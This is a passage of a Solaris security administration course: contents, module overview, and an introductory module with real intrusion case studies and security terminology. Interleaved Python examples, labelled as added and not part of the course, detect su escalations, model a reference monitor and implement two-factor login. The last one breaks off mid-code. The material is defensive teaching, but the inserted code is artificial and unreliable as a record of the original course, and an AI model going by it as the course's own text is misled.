        Task – Using OpenSSH ......... 16-38


    Task – Checking Secure Shell Encryption ........ 16-39
    Task – Configuring Client Keys ........ 16-40
    Task – Using the ssh-agent Program ........ 16-40

  Exercise Summary ........ 16-41
  Exercise Solutions ........ 16-42
    Installing OpenSSH ........ 16-42
    Using OpenSSH ........ 16-42
    Checking Secure Shell Encryption ........ 16-44
    Configuring Client Keys ........ 16-46
    Using the ssh-agent Program ........ 16-47

Securing Physical Access ........ 17-1
  Objectives ........ 17-1
  Relevance ........ 17-2
  Additional Resources ........ 17-3
  Assessing the Risk From Physical Intrusion ........ 17-4
    Physical Intrusion Solutions ........ 17-5
    Types of Physical Intrusion ........ 17-6
    Securing IT Equipment ........ 17-8
    Implementing Physical Network Security ........ 17-10
    Securing Network Infrastructure ........ 17-11
    Appraising the Risk of Eavesdropping ........ 17-13
    Using Encryption ........ 17-15
    Strengthening Help Desk Processes ........ 17-17
    User Authentication Techniques ........ 17-18
  Applying Physical Security Measures ........ 17-20
    The Stop-A Key ........ 17-21
    Disabling the Stop-A Key ........ 17-22
    Enabling EEPROM Security ........ 17-23
    EEPROM Passwords ........ 17-26
  Exercise: Working With Physical Security ........ 17-28
    Preparation ........ 17-28
    Task – Disabling the Stop-A Key ........ 17-28
    Task – Considering the Physical Security of Your Systems ........ 17-28
  Exercise Summary ........ 17-29
  Exercise Solutions ........ 17-30
    Disabling the Stop-A Key ........ 17-30
    Considering the Physical Security of Your Systems ........ 17-30

Connecting the Enterprise Network to the Outside World ........ 18-1
  Objectives ........ 18-1
  Relevance ........ 18-2
  Additional Resources ........ 18-3
  Designing the Network to Improve Security ........ 18-4
    Improving Security With a Firewall ........ 18-5
    Using Solaris SunScreen Firewall ........ 18-7


    Evaluating IPsec as a Firewall Replacement ........ 18-8
    Using Routing Security Features ........ 18-10
    Masking Hosts Using a Proxy Server ........ 18-12
    Securing Routers, Proxy Servers, and Firewalls ........ 18-14
    Creating Demilitarized Zones (DMZ) ........ 18-16
    Providing Secure Access Using a Virtual Private Network ........ 18-17
    Sample Architectures ........ 18-19
  Running Enterprise Security Audits ........ 18-21
    Running Trial Attacks ........ 18-22
    Using Third Parties to Run Trial Attacks ........ 18-22
  Applying Ongoing Network Security Measures ........ 18-24
    Identifying Ongoing Tasks ........ 18-25
  Keeping Current With Security Issues ........ 18-28
    Identifying Information Sources ........ 18-29

On-Line Security Resources ........ A-1
  Advisory and Certification Bodies ........ A-1
    CERT ........ A-1
    INFOSEC - Information Systems Security Organization ........ A-1
    Computer Security Technology Center ........ A-2
  Security Standards ........ A-3
    Common Criteria ........ A-3
    National Security Agency (NSA) ........ A-3
    CSRC – Computer Security Division ........ A-3
    ITSEC (Europe) ........ A-4
    IEEE Computer Society ........ A-4
    IETF ........ A-4
    The Open Group ........ A-5
  Useful Web Sites ........ A-6
    Sun Security Coordination Team ........ A-6
    The Computer Incident Advisory Center ........ A-6
    Computer and Internet Security Resources ........ A-6
    Computer Security Institute ........ A-7
    InfoWar.com ........ A-7
    InfoWorld.com ........ A-7
    Risks Digest ........ A-7
    SecurityFocus.com ........ A-8
    Security Portal ........ A-8
    SecuritySearch.net ........ A-8
    SecurityStats.com ........ A-8
    USENIX ........ A-8


Solaris OE Security Tools Summary ........ B-1
  The Trusted Solaris™ 8 OE ........ B-1
    Security Extensions ........ B-1
    The SunScreen™ Firewall Product ........ B-2
    SKIP ........ B-3
    IPsec ........ B-3
    Sun Enterprise Authentication Mechanism (SEAM) ........ B-4
    Pluggable Authentication Modules (PAM) ........ B-4
    Sun Enterprise Network Security Service (SENSS) ........ B-5
    Solaris OE Fingerprint Database ........ B-5
    PATCHDIAG ........ B-5
    ASET ........ B-6

Third-Party Security Tools ........ C-1
    SAINT (SATAN/SARA) ........ C-1
    Courtney ........ C-2
    Gabriel ........ C-3
    TripWire ........ C-3
    Top ........ C-3
    TCP Wrappers ........ C-3
    Crack ........ C-4
    John the Ripper ........ C-4
    AntiCrack ........ C-4
    The npasswd Command ........ C-5
    Secure Shell (SSH) ........ C-5
    The nmap Utility ........ C-6
    Titan ........ C-7
    COPS ........ C-7
    Tiger ........ C-7
    The dsniff Sniffer ........ C-8
    The sudo Utility ........ C-8
    Cerberus Internet Scanner (CIS) ........ C-8
    Nessus ........ C-8
    Whisker ........ C-9
    The tcpdump Tool ........ C-10
  SWATCH ........ C-10
  Pretty Good Privacy (PGP) ........ C-10
  Kerberos ........ C-10
  Virtual Private Networks ........ C-11
  Anti-Sniffing Tools ........ C-11

Security Recommendations ........ D-1

Index ........ Index-1


Preface

About This Course

Course Goals

In this course, system security is covered at two main levels: the physical security of the systems, covering access to systems and networks, and the protection of the system data.

This course provides you with the practical skills required to implement, administer, and maintain a secure Solaris™ Operating Environment (Solaris OE). This course should enable you to do the following:

● Control authorized and unauthorized access to a computer or network

● Manage computer users and accounts

● Apply data copy protection, including database information

● Defend against viruses, worms, and other hacks


Course Map

The following course map shows the structure of the course. This enables you to track your progress with reference to the course goals.


Module-by-Module Overview

This course contains the following modules:

● Module 1, “Security Overview”

This module explores what security means in computing terms, and defines the required security terminology. Different types of security violation are identified, and the most likely sources of those violations are explained.

● Module 2, “Using Solaris™ OE Log Files”

This module explores the logging and tracing capabilities that can help to monitor and detect security breaches. The key security log files found on Solaris OE are described, and their locations given.

● Module 3, “The Solaris OE Basic Security Module”

This module explains the role of the Basic Security Module (BSM) in auditing and controlling system usage. In this module, you configure and use UNIX® auditing through BSM and use BSM to manage devices.

● Module 4, “Security Attacks”

This module looks in detail at some common types of system attack.

The objectives and mechanisms of Trojan horse attacks are examined, and the purpose of rootkits is described. Various other back door strategies are explained.

● Module 5, “Administering User Accounts Securely”

This module explains how to add, maintain, and delete user accounts securely. It also shows how to configure tools to check for or prevent user security violations.

This module also shows how to configure restricted shells for users to limit the danger from compromised accounts.

● Module 6, “Password Security”

This module explains how to configure and use password cracking tools to find weak passwords.


● Module 7, “Securing Root Access”

This module shows you how to configure and use Solaris OE Role-Based Access Control (RBAC). It also explains how to configure and use the sudo utility to allow privileged users to obtain extra privilege for specified tasks.

● Module 8, “File System Attacks”

This module shows how to configure disk partitions and slices to improve security. It also describes how to determine and enforce the correct file permissions and ownership.

The implications of the set-user-id (SUID), set-group-id (SGID), and sticky bits are explored. The use and configuration of access control lists to protect system resources is examined.

Finally, this module investigates security issues connected with backup and restore strategies.

● Module 9, “Auditing File Systems”

This module explores the role of file system auditing, and shows how to use TripWire to fingerprint a file system to help detect file system attacks.

● Module 10, “Attacking Network Data”

This module describes the use of network sniffing and common sniffer tools, such as the dsniff and snoop utilities. It analyzes how such tools compromise user data and passwords carried over the network.

This module also examines common network service attacks and network-based denial-of-service (DoS) attacks.

● Module 11, “Securing Network Data”

Encryption counteracts network sniffing. This module investigates the need for the encryption of network data, and then shows how such encryption can be implemented for Transmission Control Protocol/Internet Protocol (TCP/IP)-based connectivity using IPsec.

● Module 12, “Analyzing Network Services”

There are tools that scan systems and networks, looking for known vulnerabilities. This module looks at the capabilities of such tools, and focuses on the most popular one, the Security Administrator’s Integrated Network Tool (SAINT). It shows how to monitor and manage network services using SAINT, and how to configure the Courtney application to detect SAINT-style attacks.


● Module 13, “Security Network Services”

This module shows you how to determine and disable unnecessary network services. It covers the correct setup of Berkeley r commands and file transfer protocol (FTP), and explains the use of the chroot command for increased security.

This module also describes the role of authentication tools, such as Pluggable Authentication Modules (PAM) and Sun Enterprise Authentication Mechanism (SEAM).

● Module 14, “Hardening the System”

This module examines the concepts of system hardening, and shows how to configure and use tools such as Titan and ASET to perform system hardening.

● Module 15, “Authenticating Network Services”

This module shows you how to configure and use TCP Wrappers.

● Module 16, “Securing Remote Access”

This module shows you how to configure and use Secure Shell (SSH).

● Module 17, “Securing Physical Access”

This module describes the need for physical security, and explains some of the counter-measures that can be applied. Specifically, it shows how to disable the STOP-A key, and explains how this enhances physical security. It also shows how to set electrically erasable, programmable, read-only memory (EEPROM) passwords.

● Module 18, “Connecting the Enterprise Network to the Outside World”

This module examines wider network security issues and explains the role of firewalls, proxy servers, and so on. It looks at security issues specific to routers, and how these might compromise security.

This module also describes the ongoing security tasks that are necessary to keep a network of systems secure. Common sources of security information are listed, along with where the latest security issues and patches can be found.


Course Objectives

Upon completion of this course, you should be able to:

● Discuss the need for computer security and list the common terminology for describing information technology (IT) security

● Use standard Solaris OE logging and auditing facilities to monitor attempted and successful security attacks

● Configure user accounts in a secure manner

● Advise users on good password policy and identify user accounts with insecure passwords

● Configure files, directories, and devices in a secure manner and implement secure user access to file system services

● Fingerprint a file system for detecting potential security attacks

● Describe the vulnerabilities of an IT network

● Encrypt data transmitted over the network

● Configure network services to secure the network against unauthorized access

● Describe the need for controlled physical access to IT equipment

● Discuss the means of securing access to all aspects of an enterprise IT configuration


Topics Not Covered

This course does not cover the following topics:

● Solaris OE administration. This is covered in the following two courses offered by Sun Educational Services:

● SA238 or WSB238: Solaris™ 8 Operating Environment System Administration I

● SA288 or WSB288: Solaris™ 8 Operating Environment System Administration II

● Transmission Control Protocol/Internet Protocol (TCP/IP) network administration. This is covered in the following course offered by Sun Educational Services:

● SA389 or WSB389: Solaris™ 8 Operating Environment TCP/IP Network Administration


How Prepared Are You?

To be sure you are well prepared to take this course, check that you can answer yes to the following questions:

● Can you add user accounts to Solaris OE?

● Can you configure basic TCP/IP to connect a Solaris OE workstation to a corporate network?

● Can you install a Solaris OE workstation or server?


Introductions

Now that you have been introduced to the course, introduce yourself to the other students and the instructor, addressing the items shown on the overhead.


How to Use Course Materials

To enable you to succeed in this course, these course materials use a learning model that is composed of the following components:

● Course map – An overview of the course content is shown under “Course Map” on page Preface-ii so you can see how each module fits into the overall course goal.

● Objectives – What you should be able to accomplish after completing each module is listed at the beginning of each module.

● Relevance – This section, which appears in every module, provides scenarios or questions that introduce you to the information contained in the module and provoke you to think about how the content of the module relates to the application of security in general, and Solaris OE in particular.

● Lecture – The instructor presents information specific to the topic of the module. This information helps you to acquire the knowledge and skills necessary to succeed with the exercises.

● Exercise – Lab exercises give you the opportunity to practice your skills and apply the concepts presented in the lecture.


Course Icons and Typographical Conventions

The following conventions are used in this course to represent various training elements and alternative learning resources.

Icons

Additional resources – Indicates other references that provide additional information on the topics described in the module.

Note – Indicates additional information that can help students but is not crucial to their understanding of the concept being described. Students should be able to understand the concept or complete the task without this information. Examples of notational information include keyword shortcuts and minor system adjustments.

Caution – Indicates that there is a risk of personal injury from a nonelectrical hazard, or risk of irreversible damage to data, software, or the operating system. A caution indicates that the possibility of a hazard (as opposed to certainty) might happen, depending on the action of the user.

Warning – Indicates that either personal injury or irreversible damage of data, software, or the operating system will occur if the user performs this action. A warning does not indicate potential events; if the action is performed, catastrophic events will occur.


Typographical Conventions

Courier is used for the names of commands, files, directories, programming code, and on-screen computer output, for example:

Use dir to list all files.
system% You have mail.

Courier is also used to indicate programming constructs, such as class names, methods, and keywords; for example:

The getServletInfo method is used to get author information.
The java.awt.Dialog class contains the Dialog constructor.

Courier bold is used for characters and numbers that you type; for example:

To list the files in this directory, type:
# dir

Courier bold is also used for each line of programming code that is referenced in a textual description; for example:

1 import java.io.*;
2 import javax.servlet.*;
3 import javax.servlet.http.*;

Notice the javax.servlet interface is imported to allow access to its life cycle methods (line 2).

Courier italics is used for variables and command-line placeholders that are replaced with a real name or value; for example:

To delete a file, use the del filename command.


Module 1

Security Overview

Objectives

Upon completion of this module, you should be able to:

● Describe basic system security, its manifestations, and the sources and implications of poor security

● Explain what security means in computing terms

● Explain why system security is important

● Recognize security terminology

● Identify different types of security violations

● Describe the most likely sources of security violations

● Describe the need for security policy

● Recognize the difference between prevention of security violations and fixing after the event

● Explain how to obtain and build third-party security tools


Relevance

Discussion – The following questions are relevant to understanding what system security is all about:

● Why do computer systems need security?

● What would happen if all users had unrestricted access to all systems?

● How can administrators tighten security on their systems?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Schneier, Bruce. Secrets & Lies. John Wiley & Sons, 2000.

● Scambray, McClure, Kurtz. Hacking Exposed. Osborne McGraw-Hill, 2001.

● Stoll, Clifford. The Cuckoo’s Egg. Pocket Books, 1995.

● Bell, D.E. and LaPadula, L.J. Secure Computer Systems: Unified Exposition and Multics Interpretation, MTR-2997 Rev. 1, MITRE Corporation, Bedford, Massachusetts, March 1976.

● Network Working Group – Request for Comments: 2196, “Site Security Handbook” [http://www.cis.ohio-state.edu/cgi-bin/rfc/rfc2196.html], accessed 14 May 2001.

● Department of Defense, Trusted Computer System Evaluation Criteria (DOD-5200.28-STD) [http://www.radium.ncsc.mil/tpep/library/rainbow/5200.28-STD.html] [http://www.dynamoo.com/orange/]

Tool Downloads

● GNU Zip as an SVR4 package, [http://www.sunfreeware.com]

● GNU C++ Compiler as an SVR4 package, [http://www.sunfreeware.com]

● GNU Make as an SVR4 package, [http://www.sunfreeware.com]

● Perl as an SVR4 package, [http://www.sunfreeware.com]


Understanding Security

In this course, system security is presented at two levels: the physical security of the systems, including access to systems and networks, and the protection of the system data.

Computer security includes the following:

● Controlling authorized and unauthorized access to a computer or network

● Managing computer users and accounts

● Protecting data, including database information

● Defending against viruses, worms, and other malicious attacks

● Controlling physical access to IT systems


Security and UNIX®

The original UNIX® operating system was not designed with the levels of security that most corporate and educational users now demand. The UNIX developers wrote the operating system in an environment where security, as we understand the term today, was not the prevailing concern. Their focus was to design a system where users or wayward programs were prevented from accidentally interfering with each other. Preventing malicious damage was not a consideration.

However, they did incorporate a security system that controls:

● User access to the system

● The way users and programs access files

● Access to system resources

Unfortunately, this security system does not prevent users from writing programs with flaws that can deliberately or accidentally bypass these security controls. In fact, nearly all of the security holes in UNIX are the fault of bad programming rather than a flaw in the basic design philosophy.


Security Is Partly a Matter of Education

As the person responsible for implementing security in your UNIX environment, you might have encountered people in your user community who are reluctant to implement stricter security measures. Users might be accustomed to sharing data and programs, and they might have free access to compilers and system devices (this might be particularly true in a research environment). The tradition of open access in UNIX is a strong one. Therefore, in your workplace you might have two security tasks rather than one:

● Secure your UNIX environment to a level appropriate for the sensitivity of the data or the importance of the application environment.

● Educate your user community to respect and accept the level of security required so that the first task can be achieved. Higher levels of security impact ease of use; educate your users to accept the restrictions rather than unilaterally impose the restrictions.


UNIX Software

The open nature of UNIX resulted in an initial popularity that meant much of the UNIX operating system and its utilities were written by users, not system designers. These were often university students or software developers at research labs, who developed the software at a time when sophisticated engineering tools and techniques were not available. Many bugs were introduced into UNIX because of this lack of coherent design and rigorous testing.

Many of the original security flaws have been found and fixed. However, when new software is written, new security holes are found. It is, therefore, important to keep track of the latest security bulletins and to install operating system and application patches as they are released.


Examples of Break-Ins

The following examples are real attacks made on organizations. Theseexamples illustrate how easy it is to mount an attack and how fast theattackers’ intrusion can spread from the initial system to whole networks.The examples also show how damaging and costly even a seeminglyharmless attack can be.

Chronology of a Host Compromise

At 12 noon on July 19, 1995, a team of intruders attacked an organization'scomputer system – a system on which the intruders already had validuser accounts. Then intruders exploited their knowledge of theorganization’s personnel. Their goal was to obtain the root password forthe organization's primary UNIX server, and from there, to wreak havoc.

At 1 p.m., using administrative privileges at another site, the intruderscreated a user account at that site with the same account and user name asthe system manager of the target organization. The intruders sent anemail message from this fake account to one of the system administratorsin the target organization, asking for the server root password.

At 3:11 p.m., the system administrator replied to the spoofed email message and provided the real root password. The system administrator, replying from within the elm mail program, did not see the mail header and was unaware that this message did not originate from the system manager.

At 3:12 p.m., the intruders logged in to the primary server of the targetorganization using the account of another system administrator, whosepassword they had sniffed earlier. They logged in as root using thepassword they had received in the email reply. They changed the rootpassword and the password of the system administrator's account thatthey used to log in. They removed other user accounts and even changedthe electrically erasable programmable read-only memory (EEPROM)password using the eeprom command. Finally, the intruders attackedother machines on the organization's network and destroyed security andadministrative functions.

Sometime before 4 p.m., the system administration team discovered thatthey could not log in. They noticed a message on a client machine consoleindicating that an unprivileged user had successfully used the sucommand to access the root account. They also found that the EEPROMpassword was changed on the server.


At 4:12 p.m., they decided to power off their machines.

On the next day, July 20, the system administration team struggledunsuccessfully to recover.

By July 21, they decided to perform a complete reinstallation of all Sun™ workstations with an upgrade from SunOS™ to the Solaris™ 2.4 OE.

On July 24, their machines were operational, and user accounts wererestored on July 25.

On July 31, one of the client machines was compromised again by thesame team of intruders.

This is an actual incident. The individuals who performed this attack(Texas A&M University graduate students completing a computersecurity laboratory exercise) were later identified. Instead of beingprosecuted, they were rewarded. The attack was real, but it was made in acontrolled environment as part of a graduate-level computer securitycourse.

This example highlights several lessons for all security administrators:

● Guile and subterfuge were used to accomplish the initial securitybreach.

● The initial intrusion quickly led to the compromise of a large part ofthe network.

● In contrast to the speed of the attack, it took a long time to restorethe systems back to a secure state.
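The console message that alerted the administration team (an unprivileged user successfully using su to become root) is the kind of event Solaris records in /var/adm/sulog when SULOG is set in /etc/default/su. The following Python script is an added example, not part of the course material: it parses sulog-style lines and reports successful switches to root by accounts other than root, plus accounts with repeated failures that suggest password guessing. The sample log lines, user names and terminals are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Solaris su(1M) appends one line per attempt to the file named by SULOG
# in /etc/default/su (normally /var/adm/sulog):
#   SU MM/DD HH:MM +|- tty from-user-to-user
# "+" marks a successful switch, "-" a failed one.
SULOG_RE = re.compile(
    r"^SU\s+(?P<date>\d\d/\d\d)\s+(?P<time>\d\d:\d\d)\s+"
    r"(?P<status>[+-])\s+(?P<tty>\S+)\s+(?P<pair>\S+)\s*$"
)


@dataclass(frozen=True)
class SuEvent:
    date: str
    time: str
    success: bool
    tty: str
    src: str   # account that ran su
    dst: str   # account it switched to


def parse_sulog(text):
    """Parse sulog text into SuEvent records; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = SULOG_RE.match(line.strip())
        if not m:
            continue
        # su writes "from-to"; split on the last "-" so a source user
        # name that itself contains "-" is still handled.
        src, _, dst = m.group("pair").rpartition("-")
        events.append(SuEvent(m.group("date"), m.group("time"),
                              m.group("status") == "+", m.group("tty"), src, dst))
    return events


def root_escalations(events):
    """Successful switches to root by accounts other than root."""
    return [e for e in events if e.success and e.dst == "root" and e.src != "root"]


def failed_root_attempts(events):
    return [e for e in events if not e.success and e.dst == "root"]


def guessing_sources(events, threshold=3):
    """Accounts with at least `threshold` failed attempts to su to root."""
    counts = {}
    for e in failed_root_attempts(events):
        counts[e.src] = counts.get(e.src, 0) + 1
    return {user: n for user, n in counts.items() if n >= threshold}


# Constructed sample, not a real log.
SAMPLE_SULOG = """\
SU 07/19 09:02 + console root-operator
SU 07/19 14:58 - pts/2 guest-root
SU 07/19 14:59 - pts/2 guest-root
SU 07/19 15:00 - pts/2 guest-root
SU 07/19 15:12 + pts/3 jsmith-root
this line is not a sulog record and is ignored
"""

if __name__ == "__main__":
    evs = parse_sulog(SAMPLE_SULOG)
    for e in root_escalations(evs):
        print(f"ALERT {e.date} {e.time}: {e.src} became root on {e.tty}")
    for user, n in guessing_sources(evs).items():
        print(f"WARN {user}: {n} failed attempts to su to root")
```

Run against the real file with `parse_sulog(open("/var/adm/sulog").read())`; the escalation list is what a daily review should look at first, because a legitimate administrator becoming root is expected, whereas an ordinary account doing so is the event the story above turns on.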

Western Union

On September 9, 2000, Western Union warned thousands of online customers that hackers had broken into the company's Web site. Although no fraudulent transactions or breaches of personal information were discovered, the penetration could have affected online users. More than 10,000 customers were alerted and advised to cancel their credit and debit cards. The Web site was out of service that evening, and remained that way for several days.

In this example, an intrusion, which apparently did no damage, causedWestern Union a huge loss of business and customer trust.


Nuclear Power Station

In June 1999, a guard employed to protect a nuclear power station attempted to sabotage the site's computers. The guard triggered a high-level security alert that shut down the station's automatic access control system and electronically locked the doors, closing the station while colleagues searched for an intruder.

The guard is believed to have hacked into the station’s computer systemto alter sensitive information. An employee said:

“He got into one of the systems and wiped the records. The securitypeople are still very touchy when we try to find out exactly whathappened.”

The incident was so serious that a working party was formed to reviewsecurity and tough, new security checks were imposed at nuclear powerstations.

This example underscores how disgruntled employees can pose a severerisk to system security.

Travelocity

In January 2001, a security breach at Travelocity exposed the personalinformation of up to 51,000 of the online travel company's customers whohad participated in a site promotion. Customer names, addresses, phonenumbers, and email addresses were revealed because of an inadequatelyprotected directory, perhaps for up to a month. The replacement of serversin San Francisco with new ones in Tulsa caused this breach.

This example shows that companies sometimes make it easy for an attacker to gain access to individuals' private information.

FTP Server

In April 2001, PGP Security’s Computer Vulnerability EmergencyResponse Team (COVERT) notified three vendors that new vulnerabilitieshad been discovered in their file transfer protocol (FTP) server software.The security holes could allow a hacker to break into the servers, stealdata, deface Web sites, or substitute false data for information a companyprovides to its customers.


FTP servers are used by more than 90 percent of all enterprise networks toshare data with employees, partners, and customers, and the vulnerabilitycould affect a significant portion of those networks. The COVERT lab isnot aware of any serious failures attributed to the vulnerability but, asnews of the security hole spread, it became almost a race to see if vendorscould patch their systems before they were exploited.

This example shows that even security experts sometimes get it wrong.

Yahoo! Web Server

In February 2000, the Yahoo! Web portal site was the target of a distributed denial-of-service (DoS) attack. At that time, Yahoo! was the highest profile company to admit to being a victim of such an attack.

According to Yahoo!, the attack originated from 50 different InternetProtocol (IP) addresses and up to 1 Gbyte of requests per second floodedthe Yahoo! routers. According to a Yahoo! spokeswoman their routers:

“... experienced a coordinated, distributed denial-of-service attack atone of its California data centers which caused intermittent inabilityto access some, but not all, Yahoo! services.”

Yahoo! faces DoS attacks on a fairly regular basis, the companyspokeswoman said, but it normally can override the problem byre-routing resources. This was the first time the site was forced offline bysuch an attack.

The attack took the site offline for approximately three hours from about10:30 a.m. to 1:10 p.m. on a Monday. By Monday evening, the site hadfilters in place to block the attack and the network was running at fullpower. Yahoo! said it did not know who was responsible for taking thesite down.

Although Yahoo! refused to estimate how much the attack cost it in lostrevenue, analysts estimate the loss will add up to millions of dollars.

“You're talking about one of the biggest sites on the Web going down in the middle of the business day. That's pretty significant.”

– Malcolm Maclachlan, International Data Corp.


Security Terminology

Three terms traditionally define computer security:

● Confidentiality

● Integrity

● Availability

Confidentiality is concerned with privacy, or preventing users from readingsensitive information. In a military environment, the terms security andconfidentiality are often used synonymously.

While confidentiality covers unauthorized reading, integrity is concernedwith unauthorized writing. One definition of integrity is:

“Every piece of data is as the last authorized modifier left it.”

Data integrity ensures that the unauthorized modification or deletion ofdata is not permitted. Software integrity ensures that programs are notaltered by errors, malicious users, or viruses.


Availability means ensuring that attackers cannot prevent legitimate usersfrom accessing the system. Do not confuse this with the term used bysoftware and hardware vendors selling high availability, fault tolerantsoftware and systems, which has little to do with security.

Other terms that describe computer security are:

● Trusted Computing Base – The trusted computing base (TCB) definesthe protection mechanisms inside the computer (both hardware andsoftware) that implement the security policy.

● Reference Monitor – A reference monitor is a piece of software that controls access to objects (files, devices, systems) by subjects¹ (users or programs). Typically a reference monitor is a small part of a program that is responsible for controlling access.

● Secure Kernel – A secure kernel refers to the hardware and softwareof the TCB that implements the reference monitor concept.

On some UNIX systems, executable files can be marked by the superuseras part of the TCB. Using a special trusted shell, only TCB files can beexecuted, making it more difficult for intruders to replace system files togain privileged access to the system.

1. The use of subjects and objects and their relationship are defined in the Bell-LaPadula model of computer security. See “Additional Resources” onpage 1-3.


The Orange Book

The National Computer Security Center published a book in 1985 called the U.S. Department of Defense Trusted Computer System Evaluation Criteria. It is the standard for rating computer systems for security. The book is better known as The Orange Book. It defines four divisions and seven layers of trust in a computing environment (see Figure 1-1 on page 1-16). The divisions range from D (minimum security) to A (verified design). Each level includes all the security provisions of the levels below it, so each level builds on the one before.
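To make the reference monitor concept from the previous section concrete, and to show how the C1, C2 and B1 requirements in Figure 1-1 differ in practice, here is an added Python example that is not part of the course material. It is a toy reference monitor: every access goes through one `check()` call that first applies a discretionary rule (owner/other permission bits, as at C1), then a mandatory rule using the Bell-LaPadula label properties (no read up, no write down, as at B1), and records every decision in an audit list (as at C2). The subjects, objects, label names and permission encoding are invented for illustration.

```python
from dataclasses import dataclass, field
from enum import IntEnum


class Level(IntEnum):
    """Security labels, ordered so that >= expresses 'dominates'."""
    UNCLASSIFIED = 0
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


@dataclass(frozen=True)
class Subject:
    name: str
    clearance: Level


@dataclass(frozen=True)
class Resource:
    name: str
    owner: str
    classification: Level
    owner_perms: str = "rw"   # DAC: what the owner may do ("r", "w" or both)
    other_perms: str = ""     # DAC: what everyone else may do


@dataclass
class ReferenceMonitor:
    """All subject-to-object access is mediated by check(); nothing bypasses it."""
    audit: list = field(default_factory=list)

    def _dac(self, s, o, op):
        # Discretionary access control (C1): the owner decides who may read or write.
        perms = o.owner_perms if s.name == o.owner else o.other_perms
        return op[0] in perms

    def _mac(self, s, o, op):
        # Mandatory access control (B1), Bell-LaPadula rules:
        #   read  only if clearance dominates classification  (no read up)
        #   write only if classification dominates clearance  (no write down)
        if op == "read":
            return s.clearance >= o.classification
        return s.clearance <= o.classification

    def check(self, s, o, op):
        if op not in ("read", "write"):
            raise ValueError(f"unknown operation {op!r}")
        if not self._dac(s, o, op):
            verdict, why = False, "DAC denies"
        elif not self._mac(s, o, op):
            verdict, why = False, "MAC denies"
        else:
            verdict, why = True, "allowed"
        # Auditing (C2): every decision is recorded, granted or not.
        self.audit.append((s.name, op, o.name, verdict, why))
        return verdict


def demo():
    """Constructed scenario; returns decisions keyed by (subject, op, object) and the audit trail."""
    rm = ReferenceMonitor()
    alice = Subject("alice", Level.SECRET)
    bob = Subject("bob", Level.CONFIDENTIAL)
    plan = Resource("plan", owner="alice", classification=Level.SECRET,
                    owner_perms="rw", other_perms="r")
    bulletin = Resource("bulletin", owner="alice", classification=Level.UNCLASSIFIED,
                        owner_perms="rw", other_perms="r")
    results = {}
    for s, o, op in [(alice, plan, "read"), (bob, plan, "read"),
                     (bob, plan, "write"), (alice, bulletin, "write"),
                     (bob, bulletin, "read")]:
        results[(s.name, op, o.name)] = rm.check(s, o, op)
    return results, rm.audit


if __name__ == "__main__":
    _, trail = demo()
    for subject, op, obj, verdict, why in trail:
        print(f"{subject:6} {op:5} {obj:9} {'GRANT' if verdict else 'DENY '} ({why})")
```

The instructive cases are the two MAC denials: bob holds read permission on `plan` under DAC yet cannot read it because his clearance is below its label, and alice, who owns `bulletin`, cannot write to it because that would carry SECRET information down to an UNCLASSIFIED object. A plain UNIX system (C1) has only the first check; labelled systems such as Trusted Solaris add the second.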


Figure 1-1 The Orange Book Seven Layers of Trust

● D – Minimal protection is provided; there are no security features.

● C1 – Discretionary access control and access permissions are provided. Logins with passwords are required.

● C2 – Auditing and authentication events are audited. Authentication events are kept in a secure place.

● B1 – Mandatory access control and labeled output are provided. Access is based on labels which designate security clearance.

● B2 – Configuration control, facility management, and system configuration must be documented and controlled. All administrative security and operator functions are separated.

● B3 – Access control lists and full system documentation are provided. Access is based on lists of users plus labels.

● A – Formal proof of the security of the system is required.

The following are examples of how some of the Orange Book Seven Layers translate to common, well-known computer equipment and operating systems:

● D – Typical stand-alone personal computer (PC)

● C1 – Typical out-of-the-box UNIX system

● C2 – Computer running the Solaris OE with BSM installed

● B1 – Trusted Solaris™ 8 OE

Common Terms

The following section defines common terms used in relation to computer security.


Identification and Authentication

Identification is a means of letting a third party (such as an IT system)know who you are. IT system identification can be:

● A login or account name

● A smart card or Enigma card

● The IP address of your own computer

● Caller ID used in conjunction with your phone

● A digital certificate provided by a trusted agent

None of these alone is sufficient to ensure secure computer access because:

● Login names are easily acquired

● Cards are easily stolen

● IP addresses can be acquired and used by another computer

● Burglars can break in and use your phone

● Public keys for certificates can be falsified


Authentication is the ability to prove who you are. In a secureenvironment, when you identify yourself to a computer it asks for furtherinformation to authenticate you. Means of authentication can include:

● Something you know, such as a password, personal identificationnumber, or pass phrase

● Something you have, such as a smart card or Enigma card

● Something about you, such as a fingerprint or retina scan

Although these examples are not totally foolproof, they are sufficient formost systems. Problems with these means of authentication include:

● Users give away passwords or choose obvious ones which can beguessed

● Smart cards can be stolen

● Hollywood movies demonstrate techniques (some realistic and somenot) for falsifying such personal attributes as fingerprints
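"Something you know" combined with "something you have", as an added Python example that is not part of the course material: identification is the user name, the password is verified against a salted PBKDF2 hash rather than stored in clear, and the token is modelled as a counter-based one-time code (HOTP, RFC 4226), a software stand-in for the smart card or Enigma card in the list above. A code is accepted only once, so a captured code cannot be replayed, which is the property that makes the second factor worth having even if the password is given away. The user names and passwords are constructed; the token secret is the RFC 4226 test key.

```python
import hashlib
import hmac
import os


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class Authenticator:
    """Identification (user name) followed by two authentication factors."""
    ITERATIONS = 100_000   # PBKDF2 work factor; raise for production use
    LOOKAHEAD = 5          # how far ahead of us the token counter may have drifted

    def __init__(self):
        self.users = {}
        self.audit = []    # (user, outcome) for every attempt

    def enrol(self, name, password, token_secret):
        salt = os.urandom(16)
        self.users[name] = {
            "salt": salt,
            "hash": hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.ITERATIONS),
            "token_secret": token_secret,
            "counter": 0,   # next counter value we expect the token to use
        }

    def authenticate(self, name, password, code):
        rec = self.users.get(name)
        if rec is None:
            # A production system would still run the hash here so that timing
            # does not reveal whether the user name exists.
            self._log(name, "unknown user")
            return False
        # Something you know: constant-time compare of the derived hash.
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), rec["salt"], self.ITERATIONS)
        if not hmac.compare_digest(candidate, rec["hash"]):
            self._log(name, "bad password")
            return False
        # Something you have: accept the code at the expected counter or slightly
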